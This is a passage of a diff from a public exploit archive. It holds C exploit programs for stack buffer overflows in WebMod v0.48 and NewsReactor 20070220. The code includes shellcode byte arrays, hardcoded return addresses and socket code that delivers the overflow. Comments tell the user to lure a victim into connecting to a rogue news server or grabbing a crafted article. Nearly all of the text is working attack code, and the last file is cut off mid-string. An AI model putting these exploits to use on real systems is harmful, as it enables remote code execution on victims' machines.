-	saddr.sin_family = AF_INET;
-	saddr.sin_port = htons(hostport);
-	memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);
-
-	if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
-		printf("connect() error\n");
-		return 1;
-	}
-
-	//initialize buffers
-	memset(spambuf, 'a', sizeof(spambuf));
-
-	//send initial POST request
-	sent += send(sock, initbuf, sizeof(initbuf)-1, 0);
-
-	//send 7 full spambufs to get 140000 bytes
-	for (i = 0; i < 7; ++i)
-		sent += send(sock, spambuf, sizeof(spambuf), 0);
-
-	//send partial spambuf to fill remaining data
-	//(18308, this goes right up to the EIP)
-	sent += send(sock, spambuf, 18308, 0);
-
-	//fill EIP
-	sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);
-
-	//insert code!
-	sent += send(sock, (char*)code, sizeof(code), 0);
-
-	//send newlines after content-length
-	sent += send(sock, endbuf, sizeof(endbuf)-1, 0);
-
-	printf("%u bytes sent...waiting...\n", sent);
-
-	//wait for a while so the socket isn't closed on our end
-	//before they receive all the data
-	Sleep(15000);
-
-	return 0;
-}
-
-// milw0rm.com [2007-03-01]
+/*
+ * WebMod Stack Buffer Overflow
+ *
+ * by cybermind (Kevin Masterson)
+ * cybermind@gmail.com
+ *
+ * WebMod v0.48 exploit PoC code
+ *
+ */
+#include 
+#include 
+#include 
+
+#define WIN32_LEAN_AND_MEAN
+#include 
+#include 
+#pragma comment (lib, "ws2_32.lib")
+
+/*
+local variables in connectHandle():
+
+char *input;			4
+char buf[8192+1];		8193
+int i,j;			8
+int connfd;			4
+int myid;			4
+threaddata_t *tdata;		4
+httpquery_t query;		149036
+char tmp[1025];			1025
+int rcv;			4
+char clbuf[11];			11
+
+total:				158293
+actual (due to padding):	158308
+
+
+  breakdown of types:
+	typedef struct s_var {		546
+	  char name[33];		  33
+	  char value[513];		  513
+	} var_s;
+
+
+	typedef struct s_httpquery {	149036
+	  char method[11];		  11
+	  char clientip[16];		  16
+	  char url[257];		  257
+	  char *get;			  4
+	  char *post;			  4
+	  char *cookies;		  4
+	  var_s vars[256];		  139776
+	  char currentmapname[257];	  257
+	  char sendcookies[8192+1];	  8193
+	  char contenttype[257];	  257
+	  char location[257];		  257
+	} httpquery_t;
+*/
+
+//contains data to fill the Content-Length field with
+char spambuf[20000];
+
+//code to inject
+//this particular code only works on Win2K SP4 (v5.0.4.0)
+//and kernel32.dll v5.0.2195.6688
+unsigned char code[] = {
+					// ; push string onto the stack without using 0x00
+	0xB8, 0x59, 0x5A, 0x32, 0x11,	//mov     eax, 11325A59h ; "HI!\0" + 11111111h
+	0x2D, 0x11, 0x11, 0x11, 0x11,	//sub     eax, 11111111h
+	0x50,				//push    eax
+	0x8B, 0xC4,			//mov     eax, esp	 ; eax points to string
+
+	0x33, 0xC9,			//xor     ecx, ecx	 ; zero
+
+					// ; call MessageBox
+	0x51,				//push    ecx		 ; flags (0)
+	0x50,				//push    eax		 ; caption
+	0x50,				//push    eax		 ; text
+	0x51,				//push    ecx		 ; hwnd (0)
+	0xB8, 0x98, 0x80, 0xE3, 0x77,	//mov     eax, 77E38098h ; &MessageBox
+	0xFF, 0xD0,			//call    eax
+
+					// ; call GetCurrentProcessId
+	0xB8, 0xF4, 0xB8, 0x4E, 0x7C,	//mov     eax, 7C4EB8F4h ; &GetCurrentProcessId
+	0xFF, 0xD0,			//call    eax
+
+	0x33, 0xC9,			//xor     ecx, ecx	 ; zero
+
+					// ; call TerminateProcess
+	0x51,				//push    ecx		 ; return code (0)
+	0x50,				//push    eax		 ; process id
+	0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov     eax, 7C518DC3h ; &TerminateProcess
+	0xFF, 0xD0			//call    eax
+
+};
+
+//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
+//set this to 0xFFFFFFFF to just cause a crash
+unsigned int our_eip = 0x67E03C5B;
+
+int main(int argc, char* argv[]) {
+	WSADATA wsadata;
+	int sock = 0;
+	struct hostent* host = NULL;
+	struct sockaddr_in saddr;
+
+	//data to sent initially
+	char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";
+
+	//data to send after headers
+	char endbuf[] = "\n\n";
+
+	char* hostname = NULL;
+	short hostport = 27015;
+
+	int i;
+	unsigned int sent = 0;
+
+	//get host/port from command line
+	if (argc < 2) {
+		printf("Usage:\t%s  [port=27015]\n", argv[0]);
+		return 1;
+	}
+	hostname = argv[1];
+	if (argc >= 3) hostport = atoi(argv[2]);
+
+	WSAStartup(MAKEWORD(1,1), &wsadata);
+
+	sock = socket(AF_INET, SOCK_STREAM, 0);
+	if (sock <= 0) {
+		printf("socket() error\n");
+		return 1;
+	}
+
+	host = gethostbyname(hostname);
+	if (!host) {
+		printf("gethostbyname() error\n");
+		return 1;
+	}
+
+	printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));
+
+	memset(&saddr, 0, sizeof(struct sockaddr_in));
+	saddr.sin_family = AF_INET;
+	saddr.sin_port = htons(hostport);
+	memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);
+
+	if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
+		printf("connect() error\n");
+		return 1;
+	}
+
+	//initialize buffers
+	memset(spambuf, 'a', sizeof(spambuf));
+
+	//send initial POST request
+	sent += send(sock, initbuf, sizeof(initbuf)-1, 0);
+
+	//send 7 full spambufs to get 140000 bytes
+	for (i = 0; i < 7; ++i)
+		sent += send(sock, spambuf, sizeof(spambuf), 0);
+
+	//send partial spambuf to fill remaining data
+	//(18308, this goes right up to the EIP)
+	sent += send(sock, spambuf, 18308, 0);
+
+	//fill EIP
+	sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);
+
+	//insert code!
+	sent += send(sock, (char*)code, sizeof(code), 0);
+
+	//send newlines after content-length
+	sent += send(sock, endbuf, sizeof(endbuf)-1, 0);
+
+	printf("%u bytes sent...waiting...\n", sent);
+
+	//wait for a while so the socket isn't closed on our end
+	//before they receive all the data
+	Sleep(15000);
+
+	return 0;
+}
+
+// milw0rm.com [2007-03-01]
diff --git a/platforms/windows/remote/3462.cpp b/platforms/windows/remote/3462.cpp
index 4feab277d..58b423e22 100755
--- a/platforms/windows/remote/3462.cpp
+++ b/platforms/windows/remote/3462.cpp
@@ -1,180 +1,180 @@
-/********************************************************************************
-*         NewsReactor 20070220 Article Grabbing Remote Buffer Overflow          *
-*                                Exploit 1                                      *
-*                                                                               *
-*                                                                               *
-* There is remote buffer overflow in NewsReactor 20070220 that can be triggered *
-* by grabbing articles that contain an overly long file name.                   *
-*                                                                               *
-* To exploit, convince someone to set his newsgroup server to your ip:119 and   *
-* ask him to grab an article (say with a .NZB file).                            *
-*                                                                               *
-* This exploit waits for incoming connection and then runs calc.exe.            *
-*                                                                               *
-* Return address should work on XP SP2 FR.                                      *
-* Should fail on english systems cause I took the first return address I got =D.*
-* Have Fun!                                                                     *
-*                                                                               *
-* Tested against WIN XP SP2 FR                                                  *
-* Coded and Discovered by Marsu                     *
-********************************************************************************/
-
-
-
-#include "winsock2.h"
-#include "stdio.h"
-#include "time.h"
-#include "stdlib.h"
-#pragma comment(lib, "ws2_32.lib")
-
-/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
-/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
-char calcshellcode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
-"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
-"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
-"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
-
-
-
-int main(int argc, char* argv[])
-{
-	char recvbuff[1024];
-	char evilbuff[10000];
-	sockaddr_in sin;
-	int server,client;
-	WSADATA wsaData;
-	WSAStartup(MAKEWORD(1,1), &wsaData);
-
-	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
-	sin.sin_family = PF_INET;
-	sin.sin_addr.s_addr = htonl(INADDR_ANY);
-	sin.sin_port = htons( 119 );
-	bind(server,(SOCKADDR*)&sin,sizeof(sin));
-	printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
-	printf("[+] Coded and Discovered by Marsu \n");
-	printf("[*] Listening on port 119...\n");
-	listen(server,5);
-	printf("[*] Waiting for client ...\n");
-	client=accept(server,NULL,NULL);
-	printf("[+] Client connected\n");
-	
-	if (send(client,"200 Hello there\r\n",17,0)==-1)
-	{
-		printf("[-] Error in send!\n");
-		exit(-1);
-	}
-
-	//BODY article or AUTHINFO user
-	memset(recvbuff,0,1024);
-	recv(client,recvbuff,1024,0);
-	printf("-> %s\n",recvbuff);
-	if (strstr(recvbuff,"AUTHINFO")) {
-		send(client,"381 Pass please?\r\n",18,0);
-
-		//authinfo pass
-		memset(recvbuff,0,1024);
-		recv(client,recvbuff,1024,0);
-		printf("-> %s\n",recvbuff);
-		send(client,"281 Pleased to meet you\r\n",25,0);
-	
-		//BODY article
-		memset(recvbuff,0,1024);
-		recv(client,recvbuff,1024,0);
-		printf("-> %s\n",recvbuff);	
-	}
-
-	char* postname=(char *) malloc(strlen(recvbuff)*sizeof(char));
-	memset(postname,0,100);
-	if (!strstr(recvbuff,"BODY")) {
-		printf("[-] BODY were expected. Exploit will fail.\n");
-	}
-	else {
-		memcpy(postname,recvbuff+5,strlen(recvbuff)-5);
-		printf("[+] Using %s to exploit.\n",postname);
-	}
-	
-char header[]="220 0 ";
-char header2[]=
-" article\r\n"
-"=ybegin part=1 line=128 size=127 name="
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAA"
-"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
-"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"AAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAA";
-
-char end[]=
-"\r\n"
-"=ypart begin=1 end=127\r\n"
-"BLABLABLA\r\n"
-"=yend size=127 part=1 pcrc32=d4f19f0f\r\n"
-".\r\n\0";
-
-	memset(evilbuff,'A',10000);
-	memcpy(evilbuff,header,strlen(header));
-	memcpy(evilbuff+strlen(header),postname,strlen(postname));
-	memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2));
-	memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2),calcshellcode,strlen(calcshellcode));
-	memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+strlen(calcshellcode)+70,end,strlen(end));
-	send(client,evilbuff,strlen(evilbuff),0);
-	
-	printf("[+] Evil data sent. Have fun!\n");
-	Sleep(500);
-	return 0;
-	
-}
-
-// milw0rm.com [2007-03-12]
+/********************************************************************************
+*         NewsReactor 20070220 Article Grabbing Remote Buffer Overflow          *
+*                                Exploit 1                                      *
+*                                                                               *
+*                                                                               *
+* There is remote buffer overflow in NewsReactor 20070220 that can be triggered *
+* by grabbing articles that contain an overly long file name.                   *
+*                                                                               *
+* To exploit, convince someone to set his newsgroup server to your ip:119 and   *
+* ask him to grab an article (say with a .NZB file).                            *
+*                                                                               *
+* This exploit waits for incoming connection and then runs calc.exe.            *
+*                                                                               *
+* Return address should work on XP SP2 FR.                                      *
+* Should fail on english systems cause I took the first return address I got =D.*
+* Have Fun!                                                                     *
+*                                                                               *
+* Tested against WIN XP SP2 FR                                                  *
+* Coded and Discovered by Marsu                     *
+********************************************************************************/
+
+
+
+#include "winsock2.h"
+#include "stdio.h"
+#include "time.h"
+#include "stdlib.h"
+#pragma comment(lib, "ws2_32.lib")
+
+/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
+/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
+char calcshellcode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
+"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
+
+
+
+int main(int argc, char* argv[])
+{
+	char recvbuff[1024];
+	char evilbuff[10000];
+	sockaddr_in sin;
+	int server,client;
+	WSADATA wsaData;
+	WSAStartup(MAKEWORD(1,1), &wsaData);
+
+	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+	sin.sin_family = PF_INET;
+	sin.sin_addr.s_addr = htonl(INADDR_ANY);
+	sin.sin_port = htons( 119 );
+	bind(server,(SOCKADDR*)&sin,sizeof(sin));
+	printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
+	printf("[+] Coded and Discovered by Marsu \n");
+	printf("[*] Listening on port 119...\n");
+	listen(server,5);
+	printf("[*] Waiting for client ...\n");
+	client=accept(server,NULL,NULL);
+	printf("[+] Client connected\n");
+	
+	if (send(client,"200 Hello there\r\n",17,0)==-1)
+	{
+		printf("[-] Error in send!\n");
+		exit(-1);
+	}
+
+	//BODY article or AUTHINFO user
+	memset(recvbuff,0,1024);
+	recv(client,recvbuff,1024,0);
+	printf("-> %s\n",recvbuff);
+	if (strstr(recvbuff,"AUTHINFO")) {
+		send(client,"381 Pass please?\r\n",18,0);
+
+		//authinfo pass
+		memset(recvbuff,0,1024);
+		recv(client,recvbuff,1024,0);
+		printf("-> %s\n",recvbuff);
+		send(client,"281 Pleased to meet you\r\n",25,0);
+	
+		//BODY article
+		memset(recvbuff,0,1024);
+		recv(client,recvbuff,1024,0);
+		printf("-> %s\n",recvbuff);	
+	}
+
+	char* postname=(char *) malloc(strlen(recvbuff)*sizeof(char));
+	memset(postname,0,100);
+	if (!strstr(recvbuff,"BODY")) {
+		printf("[-] BODY were expected. Exploit will fail.\n");
+	}
+	else {
+		memcpy(postname,recvbuff+5,strlen(recvbuff)-5);
+		printf("[+] Using %s to exploit.\n",postname);
+	}
+	
+char header[]="220 0 ";
+char header2[]=
+" article\r\n"
+"=ybegin part=1 line=128 size=127 name="
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAA"
+"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
+"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"AAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAA";
+
+char end[]=
+"\r\n"
+"=ypart begin=1 end=127\r\n"
+"BLABLABLA\r\n"
+"=yend size=127 part=1 pcrc32=d4f19f0f\r\n"
+".\r\n\0";
+
+	memset(evilbuff,'A',10000);
+	memcpy(evilbuff,header,strlen(header));
+	memcpy(evilbuff+strlen(header),postname,strlen(postname));
+	memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2));
+	memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2),calcshellcode,strlen(calcshellcode));
+	memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+strlen(calcshellcode)+70,end,strlen(end));
+	send(client,evilbuff,strlen(evilbuff),0);
+	
+	printf("[+] Evil data sent. Have fun!\n");
+	Sleep(500);
+	return 0;
+	
+}
+
+// milw0rm.com [2007-03-12]
diff --git a/platforms/windows/remote/3463.cpp b/platforms/windows/remote/3463.cpp
index ab7f5c192..1fa7c4a78 100755
--- a/platforms/windows/remote/3463.cpp
+++ b/platforms/windows/remote/3463.cpp
@@ -1,230 +1,230 @@
-/*********************************************************************************
-*         NewsReactor 20070220 Article Grabbing Remote Buffer Overflow           *
-*                                Exploit 2                                       *
-*                                                                                *
-*                                                                                *
-* Check the other advisory for technical details.                                *
-*                                                                                *
-* This exploit connects to your newsgroups provider and posts a crafted article. *
-*                                                                                *
-* Ask your victim to grab it to trigger the bug and execute calc.exe.            *
-* Return address should work on XP SP2 FR.                                       *
-* Should fail on english systems cause I took the first return address I got =D. *
-* Have Fun!                                                                      *
-*                                                                                *
-* Tested against WIN XP SP2 FR                                                   *
-* Coded and Discovered by Marsu                      *
-*                                                                                *
-* Note: change evilbuff to crash News Bin Pro 4.32. 800 'A' should be enough.    *
-*********************************************************************************/
-
-
-#include "winsock2.h"
-#include "stdio.h"
-#include "stdlib.h"
-#pragma comment(lib, "ws2_32.lib")
-
-
-/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
-/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
-char calcshellcode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
-"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
-"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
-"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
-
-int main(int argc, char* argv[])
-{
-	struct hostent *he;
-	struct sockaddr_in sock_addr;
-	WSADATA wsa;
-	int nntpsock;
-	char recvbuff[500];
-	char buffer[100];
-	char authuser[]="AUTHINFO USER %s\r\n";
-	char authpass[]="AUTHINFO PASS %s\r\n";
-	char evilbuff[10000];
-	char *user=0,*pass=0,*subject,*group,*author;
-	int i=2;
-
-	WSACleanup();
-	WSAStartup(MAKEWORD(2,0),&wsa);
-
-	if (argc<5) {
-		printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
-		printf("[+] Coded and Discovered by Marsu \n");
-		printf("[+] Usage: %s Newsserver [-u User] [-p Pass] Group Subject Author\n",argv[0]);
-		printf("[+] example:\n    %s news.giganews.com -i user -p pass alt.binaries.dvdr boomboom superman\n",argv[0]);
-		return 0;
-	}
-	
-	if (strstr(argv[i],"-u")) {
-		i++;
-		user=argv[i];
-		i++;
-	}
-	if (strstr(argv[i],"-p")) {
-		i++;
-		pass=argv[i];
-		i++;
-	}
-	group=argv[i++];
-	subject=argv[i++];
-	author=argv[i];
-	
-	printf("%s \n%s \n%s \n",group,subject,author);
-	if ((he=gethostbyname(argv[1])) == NULL) { 
-		printf("Failed\n[-] Could not init gethostbyname\n");
-		return 1;
-	}
-	if ((nntpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-		printf("Failed\n[-] Socket error\n");
-		return 1;
-	}
-
-	sock_addr.sin_family = PF_INET;
-	sock_addr.sin_port = htons(119);
-	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
-	memset(&(sock_addr.sin_zero), '\0', 8);
-	if (connect(nntpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
-		printf("[-] Unable to connect\n");
-		return 1;
-	}
-	printf("[+] Connected to %s\n",argv[1]);
-	memset(recvbuff,'\0',500);
-	recv(nntpsock, recvbuff, 500, 0);
-	printf("-> %s",recvbuff);
-	
-	if (user!=0) {
-		memset(buffer,0,100);
-		sprintf(buffer,authuser,user);
-		send(nntpsock,buffer,strlen(buffer),0);
-		printf("[+] USER %s\n",user);
-		memset(recvbuff,'\0',500);
-		recv(nntpsock, recvbuff, 500, 0);
-		printf("-> %s",recvbuff);
-	}
-	
-	if (pass!=0) {
-		memset(buffer,0,100);
-		sprintf(buffer,authpass,pass);
-		send(nntpsock,buffer,strlen(buffer),0);
-		printf("[+] PASS %s\n",pass);
-		memset(recvbuff,'\0',500);
-		recv(nntpsock, recvbuff, 500, 0);
-		printf("-> %s",recvbuff);
-	}
-	
-	send(nntpsock,"MODE READER\r\n",strlen("MODE READER\r\n"),0);
-	printf("[+] MODE READER\n");
-	memset(recvbuff,'\0',500);
-	recv(nntpsock, recvbuff, 500, 0);
-	printf("-> %s",recvbuff);
-	
-	send(nntpsock,"POST\r\n",strlen("POST\r\n"),0);
-	printf("[+] POST\n");
-	memset(recvbuff,'\0',500);
-	recv(nntpsock, recvbuff, 500, 0);
-	printf("-> %s",recvbuff);
-	
-char header[]=
-"From: %s <%s@blabla.com>\r\n"
